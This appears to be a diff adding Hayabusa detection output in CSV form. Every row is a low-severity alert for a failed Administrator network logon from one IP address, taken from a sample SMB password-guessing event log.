+2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SnpCLI2EJZRhr3vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztEU2m9SwbqgSdVY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MHO1X0zwmoWotcM4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ck429g2Cs4siVVq4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9txH9zA3oY885iTi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: alIIEzE2rTrNtOtr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ww4BXLwhaNxOttgo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GPdz2pjDocMWqctT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOm1i2a20IDNmIu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ukSrSu516dHlHQ94  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: grdERCipFl1FMB1o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmpuUsIRbp57KCRD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VWLuqrOQSQuqcwUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eEASOf84AX8ow4vf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcgNTGlESh6FytEY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeVo7D3oBsdUMHfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mLqSB2yGMksaBgUS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7qRzzpL2YhfIGSD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvE5tMw3MjDhA0Fe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXuNgOkIzvKIuJki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q8vPHEXrxVpUyKZq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vk7sh6VM7AZQv2in  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jurt5hAg90y1VWdT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlrPbTbJRTxFakiv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RQ5cWmYL8weCCRT0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0v2Emgn7BD1STZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MJppWxAiNJ4D0s2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHVcJEec3y6v9gIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 68RKE5dS8X5Px2gR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Np8mTqhr7QasXk1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhpDNDIPVyRlfej8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZtmxGeLj25VSUcm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SPN8w8WghBYzChZc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 36hmbCuKxF9Dt4vR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TALpRirdvB9a8y6M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvEvwFeXGOgycZvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ppxeOgZNua2Ieuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n4U5XdQu1YtSat7J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MN0OfYE6vPgqyyZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmfCPIdiTH9gG2qZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UtcHAxmfDL9C9uZa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TX62kMSJqq0Lv8o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hA20OdabfW5DMphV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ex5Awm2zaVhvAMTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I72BOMPQHyyP374g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4al5pUa4mKfbL734  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UNHH8ESWZ4Rx6K93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ay3XdxRFXXaD4Ib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PgyG7spUL5glkVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6D6PVnrIODwtcIXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cRZgqmQbL3l7KTke  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HYGKv2l0s9XZnqkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wX2R08dxiEcRNzcM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcN791fdSHwaWuBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CRObbkQsykQma2Tn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v4UvU7VglbA2p0Z9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ODkwHD0dwGaWhVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bPQ5GsX1UUXA6ws  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bvRQ0dVaLawXoo2O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjxwDdOYBDDSJGun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czlTDa1F6edSUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mrtgv5HAqRuelEvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfny9Y4SGRZTUXi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hdhoRgnyj4JPpN2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K4Qclkpq5ZMKmdCB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GdZSrcqmfGBfAVy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XA7eJrFopzOb3YQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2XoSwawv7Ji26GQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 637CaCAc9u7z99X7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Y6Pww45qxQjrZ0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5CPU20SF5i6Cdq34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HAdaPDVTws6TObvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
